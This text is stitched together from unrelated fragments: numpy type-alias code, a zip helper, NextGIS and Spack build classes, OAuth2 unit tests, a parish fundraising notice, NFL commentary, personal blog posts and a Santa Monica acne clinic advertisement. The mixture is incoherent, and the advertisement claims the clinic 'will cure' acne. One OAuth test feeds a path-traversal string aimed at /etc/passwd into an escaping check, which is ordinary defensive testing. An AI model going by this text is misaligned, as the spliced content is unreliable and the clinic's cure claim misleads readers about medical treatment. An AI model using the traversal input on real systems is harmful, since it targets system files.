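                  'response': '#/responses/'}[component_type]
    else:
        prefix = '#/components/%ss/' % component_type
    return {'$ref': prefix + name}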
|
We surpassed our goal for this year! Thank you to all who have pledged. As of Aug 1, we are $2,274.15 over goal! You can continue to make pledges and contributions; every dollar over goal is returned to the parish tax-free, so we will have the funds for the Youth Ministry, the resurfacing of the PAC parking lot, and church painting expenses. |
"""
Due to compatibility, numpy has a very large number of different naming
conventions for the scalar types (those subclassing from `numpy.generic`).
This file produces a convoluted set of dictionaries mapping names to types,
and sometimes other mappings too.
.. data:: allTypes
A dictionary of names to types that will be exposed as attributes through
``np.core.numerictypes.*``
.. data:: sctypeDict
Similar to `allTypes`, but maps a broader set of aliases to their types.
.. data:: sctypes
A dictionary keyed by a "type group" string, providing a list of types
under that group.
"""
from numpy.compat import unicode
from numpy.core._string_helpers import english_lower
from numpy.core.multiarray import typeinfo, dtype
from numpy.core._dtype import _kind_name
sctypeDict = {} # Contains all leaf-node scalar types with aliases
allTypes = {} # Collect the types we will add to the module
# separate the actual type info from the abstract base classes
_abstract_types = {}
_concrete_typeinfo = {}
for k, v in typeinfo.items():
# make all the keys lowercase too
k = english_lower(k)
if isinstance(v, type):
_abstract_types[k] = v
else:
_concrete_typeinfo[k] = v
_concrete_types = {v.type for k, v in _concrete_typeinfo.items()}
def _bits_of(obj):
try:
info = next(v for v in _concrete_typeinfo.values() if v.type is obj)
except StopIteration:
if obj in _abstract_types.values():
raise ValueError("Cannot count the bits of an abstract type")
# some third-party type - make a best-guess
return dtype(obj).itemsize * 8
else:
return info.bits
def bitname(obj):
"""Return a bit-width name for a given type object"""
bits = _bits_of(obj)
dt = dtype(obj)
char = dt.kind
base = _kind_name(dt)
if base == 'object':
bits = 0
if bits != 0:
char = "%s%d" % (char, bits // 8)
return base, bits, char
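# For example (illustrative): bitname(dtype('float64').type) returns
# ('float', 64, 'f8'), while object types report 0 bits and keep the bare
# kind character, e.g. ('object', 0, 'O').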
def _add_types():
for name, info in _concrete_typeinfo.items():
# define C-name and insert typenum and typechar references also
allTypes[name] = info.type
sctypeDict[name] = info.type
sctypeDict[info.char] = info.type
sctypeDict[info.num] = info.type
for name, cls in _abstract_types.items():
allTypes[name] = cls
_add_types()
# This is the priority order used to assign the bit-sized NPY_INTxx names, which
# must match the order in npy_common.h in order for NPY_INTxx and np.intxx to be
# consistent.
# If two C types have the same size, then the earliest one in this list is used
# as the sized name.
_int_ctypes = ['long', 'longlong', 'int', 'short', 'byte']
_uint_ctypes = list('u' + t for t in _int_ctypes)
def _add_aliases():
for name, info in _concrete_typeinfo.items():
# these are handled by _add_integer_aliases
if name in _int_ctypes or name in _uint_ctypes:
continue
# insert bit-width version for this class (if relevant)
base, bit, char = bitname(info.type)
myname = "%s%d" % (base, bit)
# ensure that (c)longdouble does not overwrite the aliases assigned to
# (c)double
if name in ('longdouble', 'clongdouble') and myname in allTypes:
continue
allTypes[myname] = info.type
# add mapping for both the bit name and the numarray name
sctypeDict[myname] = info.type
# add forward, reverse, and string mapping to numarray
sctypeDict[char] = info.type
# Add deprecated numeric-style type aliases manually, at some point
# we may want to deprecate the lower case "bytes0" version as well.
for name in ["Bytes0", "Datetime64", "Str0", "Uint32", "Uint64"]:
if english_lower(name) not in allTypes:
            # Only one of Uint32 or Uint64, aliases of `np.uintp`, was (and
            # is) defined; note that these are not UInt32/UInt64 (capital I),
            # which have been removed.
continue
allTypes[name] = allTypes[english_lower(name)]
sctypeDict[name] = sctypeDict[english_lower(name)]
_add_aliases()
def _add_integer_aliases():
seen_bits = set()
for i_ctype, u_ctype in zip(_int_ctypes, _uint_ctypes):
i_info = _concrete_typeinfo[i_ctype]
u_info = _concrete_typeinfo[u_ctype]
bits = i_info.bits # same for both
for info, charname, intname in [
(i_info,'i%d' % (bits//8,), 'int%d' % bits),
(u_info,'u%d' % (bits//8,), 'uint%d' % bits)]:
if bits not in seen_bits:
# sometimes two different types have the same number of bits
# if so, the one iterated over first takes precedence
allTypes[intname] = info.type
sctypeDict[intname] = info.type
sctypeDict[charname] = info.type
seen_bits.add(bits)
_add_integer_aliases()
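# On a typical LP64 Linux platform, for example, 'int64' and 'i8' end up
# mapped to the C 'long' scalar type rather than 'longlong', because 'long'
# comes first in the priority list above.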
# We use these later
void = allTypes['void']
#
# Rework the Python names (so that float and complex and int are consistent
# with Python usage)
#
def _set_up_aliases():
type_pairs = [('complex_', 'cdouble'),
('int0', 'intp'),
('uint0', 'uintp'),
('single', 'float'),
('csingle', 'cfloat'),
('singlecomplex', 'cfloat'),
('float_', 'double'),
('intc', 'int'),
('uintc', 'uint'),
('int_', 'long'),
('uint', 'ulong'),
('cfloat', 'cdouble'),
('longfloat', 'longdouble'),
('clongfloat', 'clongdouble'),
('longcomplex', 'clongdouble'),
('bool_', 'bool'),
('bytes_', 'string'),
('string_', 'string'),
('str_', 'unicode'),
('unicode_', 'unicode'),
('object_', 'object')]
for alias, t in type_pairs:
allTypes[alias] = allTypes[t]
sctypeDict[alias] = sctypeDict[t]
# Remove aliases overriding python types and modules
to_remove = ['ulong', 'object', 'int', 'float',
'complex', 'bool', 'string', 'datetime', 'timedelta',
'bytes', 'str']
for t in to_remove:
try:
del allTypes[t]
del sctypeDict[t]
except KeyError:
pass
_set_up_aliases()
sctypes = {'int': [],
'uint':[],
'float':[],
'complex':[],
'others':[bool, object, bytes, unicode, void]}
def _add_array_type(typename, bits):
try:
t = allTypes['%s%d' % (typename, bits)]
except KeyError:
pass
else:
sctypes[typename].append(t)
def _set_array_types():
ibytes = [1, 2, 4, 8, 16, 32, 64]
fbytes = [2, 4, 8, 10, 12, 16, 32, 64]
for bytes in ibytes:
bits = 8*bytes
_add_array_type('int', bits)
_add_array_type('uint', bits)
for bytes in fbytes:
bits = 8*bytes
_add_array_type('float', bits)
_add_array_type('complex', 2*bits)
_gi = dtype('p')
if _gi.type not in sctypes['int']:
indx = 0
sz = _gi.itemsize
_lst = sctypes['int']
while (indx < len(_lst) and sz >= _lst[indx](0).itemsize):
indx += 1
sctypes['int'].insert(indx, _gi.type)
sctypes['uint'].insert(indx, dtype('P').type)
_set_array_types()
# Add additional strings to the sctypeDict
_toadd = ['int', 'float', 'complex', 'bool', 'object',
'str', 'bytes', ('a', 'bytes_')]
for name in _toadd:
if isinstance(name, tuple):
sctypeDict[name[0]] = allTypes[name[1]]
else:
sctypeDict[name] = allTypes['%s_' % name]
del _toadd, name
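# Illustrative sanity checks of the mappings built above (not part of the
# original module; results assume a typical platform):
#
#   >>> sctypeDict['i4'] is allTypes['int32']
#   True
#   >>> allTypes['float64'] is allTypes['double']
#   True
#   >>> sorted(sctypes.keys())
#   ['complex', 'float', 'int', 'others', 'uint']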
|
So the actual possibility that Gruden or Jackson could be in play for the Bengals has complicated the situations in Washington and Cleveland. It is a comparatively stress-free situation for Gruden, as long as he has a contract with the Redskins that runs through 2020. It is often nice to be wanted, and even nicer to have guaranteed money lined up. But it all adds a bit more complexity and drama to a Redskins offseason that will not be lacking in either.
Miami Dolphins: 1. Do something about Jarvis Landry. The problem with the Dolphins franchising Landry isn't wanting to have their slot receiver around. He's the player, and the Dolphins have relied on him to make plays to keep their offense going for stretches over the past three seasons. Landry's franchise tag comes in around $16 million, which isn't unreasonable for a player with Landry's production on paper.
NFL coaches are shifting toward a more analytical approach in other ways, too. Going for it on fourth and short is becoming more common, as are passing attempts on first down. During the first five weeks of the 2017 season there were 1,964 pass attempts on first down; a year later there were 2,277. It appears data is changing the game for the better, and it is only a matter of time before the entire NFL follows suit. |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2015, Jim Miller
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, zipfile, sys
from glob import glob
def addFolderToZip(myZipFile,folder,exclude=[]):
folder = folder.encode('ascii') #convert path to ascii for ZipFile Method
excludelist=[]
for ex in exclude:
excludelist.extend(glob(folder+"/"+ex))
for file in glob(folder+"/*"):
if file in excludelist:
continue
if os.path.isfile(file):
#print file
myZipFile.write(file, file, zipfile.ZIP_DEFLATED)
elif os.path.isdir(file):
addFolderToZip(myZipFile,file,exclude=exclude)
def createZipFile(filename,mode,files,exclude=[]):
myZipFile = zipfile.ZipFile( filename, mode ) # Open the zip file for writing
excludelist=[]
for ex in exclude:
excludelist.extend(glob(ex))
for file in files:
if file in excludelist:
continue
file = file.encode('ascii') #convert path to ascii for ZipFile Method
if os.path.isfile(file):
(filepath, filename) = os.path.split(file)
#print file
myZipFile.write( file, filename, zipfile.ZIP_DEFLATED )
if os.path.isdir(file):
addFolderToZip(myZipFile,file,exclude=exclude)
myZipFile.close()
return (1,filename)
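# Example usage (illustrative; the file and folder names are hypothetical):
# bundle a script plus a folder into a zip, skipping compiled files.
#
#     createZipFile("bundle.zip", "w", ["plugin.py", "images"], exclude=["*.pyc"])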
|
When I was a teen I loved Anne Rice and all things broody and sensuous. I embraced this persona as though I had found myself. It worked really well with angsty teen emotion and the desire to know who I was.
Recently though, I had this moment of clarity where I differentiated between defining yourself vs finding yourself. Defining yourself is external: it's a conscious act of putting on a mask to show the world who you want to be, and hopefully they'll believe what they see. Finding yourself is completely internal: it hits without warning, and it's finding absolute peace and elation with who you are.
I've only recently found myself, and while it's certainly an ongoing adventure, I can honestly say that I stumbled across this new me rather than sought her out. It's genuine. There is such a zen quality to this sort of self-discovery!
And of course I'm passionate about blogging and writing for children! The notion of writing for profit elates me beyond my wildest dreams! Now that I've taken solace in who I am and what I want, I don't think it will be long before my dreams become a reality!
Love it! Love your blog! Follow your dreams... Xoxo.
God I tell you I still think she wrote the best of the vampire books.
You are going to succeed Jen. You see it already and that is half of the battle. |
# -*- coding: utf-8 -*-
"""
/***************************************************************************
NextGIS WEB API
-------------------
begin : 2014-11-19
git sha : $Format:%H$
copyright : (C) 2014 by NextGIS
email : [email protected]
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
FEATURE_ATTACHMENT_URL = lambda res_id, feature_id, attachment_id: '/api/resource/%d/feature/%d/attachment/%d' % (res_id, feature_id, attachment_id)
IMAGE_URL = lambda res_id, feature_id, image_id: '/api/resource/%d/feature/%d/attachment/%d/image' % (res_id, feature_id, image_id)
class NGWAttachment(object):
def __init__(self, attachment_id, ngw_feature):
self.id = attachment_id
self.ngw_feature = ngw_feature
    def get_attachment_url(self):
        return FEATURE_ATTACHMENT_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
    def unlink(self):
        self.ngw_feature.ngw_resource._res_factory.connection.delete(self.get_attachment_url())
def get_image_url(self):
return IMAGE_URL(self.ngw_feature.ngw_resource.common.id, self.ngw_feature.id, self.id)
def get_image_full_url(self):
return self.ngw_feature.ngw_resource._res_factory.connection.server_url + self.get_image_url()
    def get_image(self):
        attachment_info = self.ngw_feature.ngw_resource._res_factory.connection.get(self.get_attachment_url())
        name = attachment_info['name']
        if name is None:
            name = "image_%d" % attachment_info['id']
        # Derive the file extension from the MIME type, falling back to jpeg
        mime_parts = attachment_info['mime_type'].split('/')
        if len(mime_parts) == 2:
            image_format = mime_parts[1]
        else:
            image_format = "jpeg"
        file_content = self.ngw_feature.ngw_resource._res_factory.connection.download_file(self.get_image_url())
        return [name, image_format, file_content]
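# Illustrative usage (hypothetical objects; a live NGWFeature with a server
# connection is assumed):
#
#     attachment = NGWAttachment(attachment_id, ngw_feature)
#     name, ext, data = attachment.get_image()
#     with open('%s.%s' % (name, ext), 'wb') as f:
#         f.write(data)
|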
As of this moment, I am recovering from what was essentially a heart failure episode that occurred in February 2019. I am slowly regaining strength and working on musical ideas that are popping into my head. I will also be returning to live performances by 2020. I'm putting together the right combination of players, which is tough considering what I do, but there are some great players out there for sure.
I am hoping to see you all soon digging the Guitaristic Vibes. |
import csv
import sys
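#Expected inputs (assumed from the code below): "id_gene_HG.csv" maps
#Affymetrix probe set IDs to gene symbols, with a "Probe Set ID" header row;
#"name_pvalue_1191.txt" is tab-separated: gene name, loading, p-value.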
#open the file that contains the Affy IDs and gene symbols
id_gene = csv.reader(open("id_gene_HG.csv", 'rb'), delimiter = ',')
id_to_gene = {}
aff_id = []
#load every entry of the file into the dictionary, and keep just the Affy IDs
#in an auxiliary list so we can later iterate over the dictionary entries
for row in id_gene:
    id_to_gene[row[0]] = row[1]
    aff_id.append(row[0])
#remove the first entry of the dictionary, which holds the column headers
aff_id.remove("Probe Set ID")
del id_to_gene["Probe Set ID"]
#open the file with the p-values and loadings, and read it into lists
name_pvalue = open("name_pvalue_1191.txt", 'rb')
name = []
pv = []
loads = []
for row in name_pvalue:
p = row.split("\t")
name.append(p[0])
pv.append(p[2])
loads.append(p[1].strip())
#close the file
name_pvalue.close()
#and open a new file to write the output:
salida = open("id_loads.txt", "w") #would it be better to write this with csv?
#write the header
salida.writelines(["Affy_id","\t\t", "gene_symbol", "\n"])
#split the gene symbols of each dictionary entry
for entry in aff_id:
    #print (entry, "--->", id_to_gene[entry])
    sp = id_to_gene[entry].split(" /// ")
    aux = []
    #now, for each entry of sp, look it up in the file and extract its value so the entries can be compared
for chunk in sp:
for i in range(len(name)):
#print (name[i].replace("\"",""), chunk)
if name[i].replace("\"","") == chunk :
aux.append([name[i],pv[i],loads[i]])
break
    #compare the values and keep the entry with the smallest one
    if len(aux) == 0:
        salida.writelines([entry,"\t\t"," NF ", "\n"])
        print "case 0"
    elif len(aux) == 1:
        salida.writelines([entry,"\t\t", aux[0][0], "\n"])
        print "case 1"
    else:
        #scan for the index of the entry with the smallest value
        m = 0
        for i in range(1, len(aux)):
            if aux[i][2] < aux[m][2]:
                m = i
        print "case 2"
        print m
        salida.writelines([entry,"\t\t", aux[m][0], "\n"])
#close the output file
salida.close()
|
Currently, 50 million Americans suffer from acne, making it the most common skin condition. You're not alone if you have this condition, and you know better than anyone that it can be more than just a physical issue: it can also take a mental toll. Acne can cause semi-permanent or permanent skin scarring, low self-esteem, poor self-image, depression and anxiety. You may even avoid social gatherings, your loved ones, and friends. With acne dermatology in Santa Monica, you can treat this life-hampering issue.
Acne dermatology in Santa Monica can change your life. But what causes acne? There are a number of different kinds of acne that acne dermatology in Santa Monica can address. Acne vulgaris, or simple acne, includes whiteheads, blackheads and pimples. All of these are caused by dead skin cells and oil clogging hair follicles. Genetics are believed to contribute tremendously to acne and the need for acne dermatology in Santa Monica. Comedonal acne is caused by oil and debris clogging pores and includes skin-colored bumps commonly found on the forehead and chin. These bumps are called comedones, also known as blackheads. Hormonal acne is often experienced by women and teenagers and is caused by hormones which trigger facial oil production. Menstrual cycles can be a time in which women experience flare-ups. Inflammatory acne consists of red bumps and pustules that are not whiteheads, blackheads or comedones and likely has to be treated by acne dermatology in Santa Monica. Cystic acne is not infected and is difficult to treat without professional assistance. This kind of acne can be serious and may need treatment by acne dermatology in Santa Monica.
Certain foods are likely to cause acne and the need for acne dermatology in Santa Monica. While there isn't any definitive research proving which foods cause acne, there are a number of foods that are under suspicion of causing this condition. It's believed that foods with a high glycemic index such as potatoes, pasta, bread, rice and desserts, as well as dairy products, whey protein supplements and sweets, can worsen existing acne. Overactive oil glands, medications such as corticosteroids and lithium, consuming junk food and smoking all contribute to acne.
In order to tackle the issue of acne, it’s important to address the causation. Many over the counter products will not address certain kinds of acne, such as cystic acne. You must use the right face wash, moisturizer and other products.
You could take topical or oral medications to solve your acne issue. There are medications available, such as minocycline, which addresses severe acne; doxycycline for regular acne; spironolactone, which reduces oil production in the skin; oral contraceptives with estrogen, which address hormonal acne; and isotretinoin, which comes in pill form and also addresses severe acne.
Acne dermatology in Santa Monica will cure your skin issues. Visit Batra Skincare online at www.batraskincare.com or call (310) 829-9099. |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import inspect
import os
import platform
import re
import spack.build_environment
from llnl.util.filesystem import working_dir
from spack.util.environment import filter_system_paths
from spack.directives import depends_on, variant
from spack.package import PackageBase, InstallError, run_after
# Regex to extract the primary generator from the CMake generator
# string.
_primary_generator_extractor = re.compile(r'(?:.* - )?(.*)')
def _extract_primary_generator(generator):
"""Use the compiled regex _primary_generator_extractor to extract the
primary generator from the generator string which may contain an
optional secondary generator.
"""
primary_generator = _primary_generator_extractor.match(generator).group(1)
return primary_generator
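# For example (illustrative):
#   _extract_primary_generator('Ninja')                       -> 'Ninja'
#   _extract_primary_generator('CodeBlocks - Unix Makefiles') -> 'Unix Makefiles'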
class CMakePackage(PackageBase):
"""Specialized class for packages built using CMake
For more information on the CMake build system, see:
https://cmake.org/cmake/help/latest/
This class provides three phases that can be overridden:
1. :py:meth:`~.CMakePackage.cmake`
2. :py:meth:`~.CMakePackage.build`
3. :py:meth:`~.CMakePackage.install`
They all have sensible defaults and for many packages the only thing
necessary will be to override :py:meth:`~.CMakePackage.cmake_args`.
For a finer tuning you may also override:
+-----------------------------------------------+--------------------+
| **Method** | **Purpose** |
+===============================================+====================+
| :py:meth:`~.CMakePackage.root_cmakelists_dir` | Location of the |
| | root CMakeLists.txt|
+-----------------------------------------------+--------------------+
| :py:meth:`~.CMakePackage.build_directory` | Directory where to |
| | build the package |
+-----------------------------------------------+--------------------+
The generator used by CMake can be specified by providing the
generator attribute. Per
https://cmake.org/cmake/help/git-master/manual/cmake-generators.7.html,
the format is: [<secondary-generator> - ]<primary_generator>. The
full list of primary and secondary generators supported by CMake may
be found in the documentation for the version of CMake used;
however, at this time Spack supports only the primary generators
"Unix Makefiles" and "Ninja." Spack's CMake support is agnostic with
respect to primary generators. Spack will generate a runtime error
if the generator string does not follow the prescribed format, or if
the primary generator is not supported.
"""
#: Phases of a CMake package
phases = ['cmake', 'build', 'install']
#: This attribute is used in UI queries that need to know the build
#: system base class
build_system_class = 'CMakePackage'
build_targets = []
install_targets = ['install']
build_time_test_callbacks = ['check']
#: The build system generator to use.
#:
#: See ``cmake --help`` for a list of valid generators.
#: Currently, "Unix Makefiles" and "Ninja" are the only generators
#: that Spack supports. Defaults to "Unix Makefiles".
#:
#: See https://cmake.org/cmake/help/latest/manual/cmake-generators.7.html
#: for more information.
generator = 'Unix Makefiles'
# https://cmake.org/cmake/help/latest/variable/CMAKE_BUILD_TYPE.html
variant('build_type', default='RelWithDebInfo',
description='CMake build type',
values=('Debug', 'Release', 'RelWithDebInfo', 'MinSizeRel'))
depends_on('cmake', type='build')
@property
def archive_files(self):
"""Files to archive for packages based on CMake"""
return [os.path.join(self.build_directory, 'CMakeCache.txt')]
@property
def root_cmakelists_dir(self):
"""The relative path to the directory containing CMakeLists.txt
This path is relative to the root of the extracted tarball,
not to the ``build_directory``. Defaults to the current directory.
:return: directory containing CMakeLists.txt
"""
return self.stage.source_path
@property
def std_cmake_args(self):
"""Standard cmake arguments provided as a property for
convenience of package writers
:return: standard cmake arguments
"""
# standard CMake arguments
std_cmake_args = CMakePackage._std_args(self)
std_cmake_args += getattr(self, 'cmake_flag_args', [])
return std_cmake_args
@staticmethod
def _std_args(pkg):
"""Computes the standard cmake arguments for a generic package"""
try:
generator = pkg.generator
except AttributeError:
generator = 'Unix Makefiles'
# Make sure a valid generator was chosen
valid_primary_generators = ['Unix Makefiles', 'Ninja']
primary_generator = _extract_primary_generator(generator)
if primary_generator not in valid_primary_generators:
msg = "Invalid CMake generator: '{0}'\n".format(generator)
msg += "CMakePackage currently supports the following "
msg += "primary generators: '{0}'".\
format("', '".join(valid_primary_generators))
raise InstallError(msg)
try:
build_type = pkg.spec.variants['build_type'].value
except KeyError:
build_type = 'RelWithDebInfo'
define = CMakePackage.define
args = [
'-G', generator,
define('CMAKE_INSTALL_PREFIX', pkg.prefix),
define('CMAKE_BUILD_TYPE', build_type),
]
if primary_generator == 'Unix Makefiles':
args.append(define('CMAKE_VERBOSE_MAKEFILE', True))
if platform.mac_ver()[0]:
args.extend([
define('CMAKE_FIND_FRAMEWORK', "LAST"),
define('CMAKE_FIND_APPBUNDLE', "LAST"),
])
# Set up CMake rpath
args.extend([
define('CMAKE_INSTALL_RPATH_USE_LINK_PATH', False),
define('CMAKE_INSTALL_RPATH',
spack.build_environment.get_rpaths(pkg)),
])
# CMake's find_package() looks in CMAKE_PREFIX_PATH first, help CMake
# to find immediate link dependencies in right places:
deps = [d.prefix for d in
pkg.spec.dependencies(deptype=('build', 'link'))]
deps = filter_system_paths(deps)
args.append(define('CMAKE_PREFIX_PATH', deps))
return args
@staticmethod
def define(cmake_var, value):
"""Return a CMake command line argument that defines a variable.
The resulting argument will convert boolean values to OFF/ON
and lists/tuples to CMake semicolon-separated string lists. All other
values will be interpreted as strings.
Examples:
.. code-block:: python
[define('BUILD_SHARED_LIBS', True),
define('CMAKE_CXX_STANDARD', 14),
define('swr', ['avx', 'avx2'])]
will generate the following configuration options:
.. code-block:: console
["-DBUILD_SHARED_LIBS:BOOL=ON",
"-DCMAKE_CXX_STANDARD:STRING=14",
"-DSWR:STRING=avx;avx2]
"""
        # Map the Python value to a CMake type and string representation:
        # booleans become BOOL OFF/ON, lists and tuples become
        # semicolon-separated STRING values, everything else is stringified
if isinstance(value, bool):
kind = 'BOOL'
value = "ON" if value else "OFF"
else:
kind = 'STRING'
if isinstance(value, (list, tuple)):
value = ";".join(str(v) for v in value)
else:
value = str(value)
return "".join(["-D", cmake_var, ":", kind, "=", value])
def define_from_variant(self, cmake_var, variant=None):
"""Return a CMake command line argument from the given variant's value.
The optional ``variant`` argument defaults to the lower-case transform
of ``cmake_var``.
This utility function is similar to
:py:meth:`~.AutotoolsPackage.with_or_without`.
Examples:
Given a package with:
.. code-block:: python
variant('cxxstd', default='11', values=('11', '14'),
multi=False, description='')
variant('shared', default=True, description='')
variant('swr', values=any_combination_of('avx', 'avx2'),
description='')
calling this function like:
.. code-block:: python
[define_from_variant('BUILD_SHARED_LIBS', 'shared'),
define_from_variant('CMAKE_CXX_STANDARD', 'cxxstd'),
define_from_variant('SWR')]
will generate the following configuration options:
.. code-block:: console
["-DBUILD_SHARED_LIBS:BOOL=ON",
"-DCMAKE_CXX_STANDARD:STRING=14",
"-DSWR:STRING=avx;avx2]
for ``<spec-name> cxxstd=14 +shared swr=avx,avx2``
"""
if variant is None:
variant = cmake_var.lower()
if variant not in self.variants:
raise KeyError(
'"{0}" is not a variant of "{1}"'.format(variant, self.name))
value = self.spec.variants[variant].value
if isinstance(value, (tuple, list)):
# Sort multi-valued variants for reproducibility
value = sorted(value)
return self.define(cmake_var, value)
def flags_to_build_system_args(self, flags):
"""Produces a list of all command line arguments to pass the specified
compiler flags to cmake. Note CMAKE does not have a cppflags option,
so cppflags will be added to cflags, cxxflags, and fflags to mimic the
behavior in other tools."""
# Has to be dynamic attribute due to caching
setattr(self, 'cmake_flag_args', [])
flag_string = '-DCMAKE_{0}_FLAGS={1}'
langs = {'C': 'c', 'CXX': 'cxx', 'Fortran': 'f'}
# Handle language compiler flags
for lang, pre in langs.items():
flag = pre + 'flags'
# cmake has no explicit cppflags support -> add it to all langs
lang_flags = ' '.join(flags.get(flag, []) + flags.get('cppflags',
[]))
if lang_flags:
self.cmake_flag_args.append(flag_string.format(lang,
lang_flags))
# Cmake has different linker arguments for different build types.
# We specify for each of them.
if flags['ldflags']:
ldflags = ' '.join(flags['ldflags'])
ld_string = '-DCMAKE_{0}_LINKER_FLAGS={1}'
# cmake has separate linker arguments for types of builds.
for type in ['EXE', 'MODULE', 'SHARED', 'STATIC']:
self.cmake_flag_args.append(ld_string.format(type, ldflags))
# CMake has libs options separated by language. Apply ours to each.
if flags['ldlibs']:
libs_flags = ' '.join(flags['ldlibs'])
libs_string = '-DCMAKE_{0}_STANDARD_LIBRARIES={1}'
for lang in langs:
self.cmake_flag_args.append(libs_string.format(lang,
libs_flags))
@property
def build_directory(self):
"""Returns the directory to use when building the package
:return: directory where to build the package
"""
return os.path.join(self.stage.path, 'spack-build')
def cmake_args(self):
"""Produces a list containing all the arguments that must be passed to
cmake, except:
* CMAKE_INSTALL_PREFIX
* CMAKE_BUILD_TYPE
which will be set automatically.
:return: list of arguments for cmake
"""
return []
def cmake(self, spec, prefix):
"""Runs ``cmake`` in the build directory"""
options = self.std_cmake_args
options += self.cmake_args()
options.append(os.path.abspath(self.root_cmakelists_dir))
with working_dir(self.build_directory, create=True):
inspect.getmodule(self).cmake(*options)
def build(self, spec, prefix):
"""Make the build targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.build_targets)
            elif self.generator == 'Ninja':
                # Pass -v for verbose output without mutating the shared
                # class-level build_targets list
                inspect.getmodule(self).ninja('-v', *self.build_targets)
def install(self, spec, prefix):
"""Make the install targets"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
inspect.getmodule(self).make(*self.install_targets)
elif self.generator == 'Ninja':
inspect.getmodule(self).ninja(*self.install_targets)
run_after('build')(PackageBase._run_default_build_time_test_callbacks)
def check(self):
"""Searches the CMake-generated Makefile for the target ``test``
and runs it if found.
"""
with working_dir(self.build_directory):
if self.generator == 'Unix Makefiles':
self._if_make_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_make_target_execute('check')
elif self.generator == 'Ninja':
self._if_ninja_target_execute('test',
jobs_env='CTEST_PARALLEL_LEVEL')
self._if_ninja_target_execute('check')
# Check that self.prefix is there after installation
run_after('install')(PackageBase.sanity_check_prefix)
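# Illustrative only: a minimal package built on this base class might look
# like the following (package name, URL, and checksum are hypothetical):
#
#     class Foo(CMakePackage):
#         """Example project built with CMake."""
#         homepage = "https://example.com/foo"
#         url = "https://example.com/foo-1.0.tar.gz"
#
#         version('1.0', sha256='...')  # hypothetical checksum
#         variant('shared', default=True, description='Build shared libraries')
#
#         def cmake_args(self):
#             return [self.define_from_variant('BUILD_SHARED_LIBS', 'shared')]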
|
"briefing-note." YourDictionary, n.d. Web. 11 April 2019. <https://www.yourdictionary.com/briefing-note>. |
"""
The MIT License
Copyright (c) 2009 Vic Fryzel
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import sys, os
sys.path[0:0] = [os.path.join(os.path.dirname(__file__), ".."),]
import unittest
import oauth2 as oauth
import random
import time
import urllib
import urlparse
from types import ListType
import mox
import httplib2
# Fix for python2.5 compatibility
try:
from urlparse import parse_qs, parse_qsl
except ImportError:
from cgi import parse_qs, parse_qsl
class TestError(unittest.TestCase):
def test_message(self):
try:
raise oauth.Error
except oauth.Error, e:
self.assertEqual(e.message, 'OAuth error occured.')
msg = 'OMG THINGS BROKE!!!!'
try:
raise oauth.Error(msg)
except oauth.Error, e:
self.assertEqual(e.message, msg)
class TestGenerateFunctions(unittest.TestCase):
def test_build_auth_header(self):
header = oauth.build_authenticate_header()
self.assertEqual(header['WWW-Authenticate'], 'OAuth realm=""')
self.assertEqual(len(header), 1)
realm = 'http://example.myrealm.com/'
header = oauth.build_authenticate_header(realm)
self.assertEqual(header['WWW-Authenticate'], 'OAuth realm="%s"' %
realm)
self.assertEqual(len(header), 1)
def test_escape(self):
string = 'http://whatever.com/~someuser/?test=test&other=other'
self.assert_('~' in oauth.escape(string))
string = '../../../../../../../etc/passwd'
self.assert_('../' not in oauth.escape(string))
def test_gen_nonce(self):
nonce = oauth.generate_nonce()
self.assertEqual(len(nonce), 8)
nonce = oauth.generate_nonce(20)
self.assertEqual(len(nonce), 20)
def test_gen_verifier(self):
verifier = oauth.generate_verifier()
self.assertEqual(len(verifier), 8)
verifier = oauth.generate_verifier(16)
self.assertEqual(len(verifier), 16)
def test_gen_timestamp(self):
exp = int(time.time())
now = oauth.generate_timestamp()
self.assertEqual(exp, now)
class TestConsumer(unittest.TestCase):
def setUp(self):
self.key = 'my-key'
self.secret = 'my-secret'
self.consumer = oauth.Consumer(key=self.key, secret=self.secret)
def test_init(self):
self.assertEqual(self.consumer.key, self.key)
self.assertEqual(self.consumer.secret, self.secret)
def test_basic(self):
self.assertRaises(ValueError, lambda: oauth.Consumer(None, None))
self.assertRaises(ValueError, lambda: oauth.Consumer('asf', None))
self.assertRaises(ValueError, lambda: oauth.Consumer(None, 'dasf'))
def test_str(self):
res = dict(parse_qsl(str(self.consumer)))
self.assertTrue('oauth_consumer_key' in res)
self.assertTrue('oauth_consumer_secret' in res)
self.assertEquals(res['oauth_consumer_key'], self.consumer.key)
self.assertEquals(res['oauth_consumer_secret'], self.consumer.secret)
class TestToken(unittest.TestCase):
def setUp(self):
self.key = 'my-key'
self.secret = 'my-secret'
